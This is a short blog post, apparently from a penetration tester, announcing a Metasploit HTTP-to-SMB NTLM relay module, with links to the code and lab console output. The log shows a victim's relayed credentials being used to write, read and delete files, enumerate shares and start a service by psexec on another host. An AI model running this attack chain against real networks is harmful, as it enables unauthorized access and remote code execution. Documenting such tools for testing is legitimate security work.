Every so often someone writes a Metasploit Module that is pretty epic. Today is one such day:
Twitter Link: https://twitter.com/webstersprodigy/status/222529916783169536
Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589
Demo / Example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170
You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay
And as soon as you do you can start doing this (using the example resource file to put a file, cat it out, enum shares available, list files on a share, then psexec all from a single URL being loaded):
163 address is the Victim I tricked into loading a URL and 182 is the system I want to get onto. This is an HTTP request resulting in a SMB Relay'd auth. It looks as though multiple targets can be used as relay targets but I haven't tested this out yet.
[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_put' from 172.16.10.163:52327 [*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay... [*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded [*] 172.16.10.163 http_ntlmrelay - File \\172.16.10.182\c$\secret.txt written [*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_get' from 172.16.10.163:52328 [*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay... [*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded [*] 172.16.10.163 http_ntlmrelay - Reading 13 bytes from 172.16.10.182 [*] 172.16.10.163 http_ntlmrelay - ----Contents---- [*] 172.16.10.163 http_ntlmrelay - hi ima secret [*] 172.16.10.163 http_ntlmrelay - ----End Contents---- [*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_enum' from 172.16.10.163:52329 [*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay... [*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded [*] 172.16.10.163 http_ntlmrelay - Shares enumerated 172.16.10.182 IPC$ADMIN$C$ [*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_ls' from 172.16.10.163:52330 [*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay... [*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded [*] 172.16.10.163 http_ntlmrelay - Listed 13 files from 172.16.10.182\c$\ [*] 172.16.10.163 http_ntlmrelay - .rnd [*] 172.16.10.163 http_ntlmrelay - PerfLogs [*] 172.16.10.163 http_ntlmrelay - config.sys [*] 172.16.10.163 http_ntlmrelay - inetpub [*] 172.16.10.163 http_ntlmrelay - xampp [*] 172.16.10.163 http_ntlmrelay - ProgramData [*] 172.16.10.163 http_ntlmrelay - MSOCache [*] 172.16.10.163 http_ntlmrelay - secret.txt [*] 172.16.10.163 http_ntlmrelay - autoexec.bat [*] 172.16.10.163 http_ntlmrelay - Windows [*] 172.16.10.163 http_ntlmrelay - Users [*] 172.16.10.163 http_ntlmrelay - Program Files [*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_rm' from 172.16.10.163:52332 [*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay... [*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded [*] 172.16.10.163 http_ntlmrelay - File \\172.16.10.182\c$\secret.txt deleted [*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_pwn' from 172.16.10.163:52333 [*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay... [*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded [*] 172.16.10.163 http_ntlmrelay - Obtraining a service manager handle... [*] 172.16.10.163 http_ntlmrelay - Creating a new service [*] 172.16.10.163 http_ntlmrelay - Closing service handle... [*] 172.16.10.163 http_ntlmrelay - Opening service... [*] 172.16.10.163 http_ntlmrelay - Starting the service...Let the fun begin...
